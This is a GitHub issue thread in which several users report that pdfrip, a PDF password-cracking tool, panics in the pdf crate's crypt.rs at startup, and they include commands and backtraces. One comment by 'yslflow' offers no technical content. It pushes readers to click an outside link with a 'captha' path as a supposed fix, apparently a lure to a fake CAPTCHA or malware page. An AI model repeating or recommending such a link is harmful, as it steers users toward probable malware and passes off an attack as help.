### ISSUE TITLE
Crash thread '<unnamed>' panicked a

### ISSUE THREAD

**Issue by pavelber** [mufeedvh/pdfrip#45]
Installed on Windows, just on start I get:
 2024-10-23T09:20:28.099Z INFO  engine > Starting password cracking job...
thread '<unnamed>' panicked at C:\Users\javaa\.cargo\registry\src\index.crates.io-6f17d22bba15001f\pdf-0.8.1\src\crypt.rs:290:41:
range end index 128 out of range for slice of length 16
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

**Comment by yslflow** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by LennartCode** [comment]
+1 can replicate.

Running `pdfrip -n 6 -f "file.pdf" default-query --max-length 9 --min-length 6`

Returns the somewhat curious message:
```
           .___ _____       .__
______   __| _// ____\______|__|_____
\____ \ / __ |\   __\\_  __ \  \____ \
|  |_> > /_/ | |  |   |  | \/  |  |_> >
|   __/\____ | |__|   |__|  |__|   __/
|__|        \/                 |__|    2.0.1

 2024-11-07T14:31:30.517Z INFO  engine > Starting password cracking job...
thread 'thread '<unnamed>thread 'thread '<unnamed>thread '' panicked at thread '<unnamed><unnamed><unnamed>C:\Users\USERNAME\.cargo\registry\src\index.crates.io-6f17d22bba15001f\pdf-0.8.1\src\crypt.rs<unnamed>' panicked at ' panicked at ' panicked at ' panicked at ' panicked at :C:\Users\USERNAME\.cargo\registry\src\index.crates.io-6f17d22bba15001f\pdf-0.8.1\src\crypt.rsC:\Users\USERNAME\.cargo\registry\src\index.crates.io-6f17d22bba15001f\pdf-0.8.1\src\crypt.rs290C:\Users\USERNAME\.cargo\registry\src\index.crates.io-6f17d22bba15001f\pdf-0.8.1\src\crypt.rsC:\Users\USERNAME\.cargo\registry\src\index.crates.io-6f17d22bba15001f\pdf-0.8.1\src\crypt.rs::41C:\Users\USERNAME\.cargo\registry\src\index.crates.io-6f17d22bba15001f\pdf-0.8.1\src\crypt.rs::290290::290290::41:
::29041:
range end index 128 out of range for slice of length 16range end index 128 out of range for slice of length 1641::
41

:
41range end index 128 out of range for slice of length 16:
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
```

**Comment by nfoerster** [comment]
I have same on Debian WSL:

```
./pdfrip -f blah.pdf default-query --max-length 8
           .___ _____       .__        
______   __| _// ____\______|__|_____  
\____ \ / __ |\   __\\_  __ \  \____ \ 
|  |_> > /_/ | |  |   |  | \/  |  |_> >
|   __/\____ | |__|   |__|  |__|   __/ 
|__|        \/                 |__|    2.0.1

 2025-08-30T17:12:25.296Z INFO  engine > Starting password cracking job...

thread '<unnamed>' panicked at /home/norman/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/pdf-0.8.1/src/crypt.rs:290:41:
range end index 128 out of range for slice of length 16
stack backtrace:
   0: __rustc::rust_begin_unwind
   1: core::panicking::panic_fmt
   2: core::slice::index::slice_end_index_len_fail::do_panic::runtime
   3: core::slice::index::slice_end_index_len_fail
   4: pdf::crypt::Decoder::from_password
   5: cracker::PDFCrackerState::attempt
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.

thread '<unnamed>' panicked at /home/norman/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/pdf-0.8.1/src/crypt.rs:290:41:
range end index 128 out of range for slice of length 16
stack backtrace:
   0: __rustc::rust_begin_unwind
   1: core::panicking::panic_fmt
   2: core::slice::index::slice_end_index_len_fail::do_panic::runtime
   3: core::slice::index::slice_end_index_len_fail
   4: pdf::crypt::Decoder::from_password
   5: cracker::PDFCrackerState::attempt
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.

thread '<unnamed>' panicked at /home/norman/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/pdf-0.8.1/src/crypt.rs:290:41:
range end index 128 out of range for slice of length 16
stack backtrace:
   0: __rustc::rust_begin_unwind
   1: core::panicking::panic_fmt
   2: core::slice::index::slice_end_index_len_fail::do_panic::runtime
   3: core::slice::index::slice_end_index_len_fail
   4: pdf::crypt::Decoder::from_password
   5: cracker::PDFCrackerState::attempt
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.

thread '<unnamed>' panicked at /home/norman/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/pdf-0.8.1/src/crypt.rs:290:41:
range end index 128 out of range for slice of length 16
stack backtrace:
   0: __rustcAborted (core dumped)
```
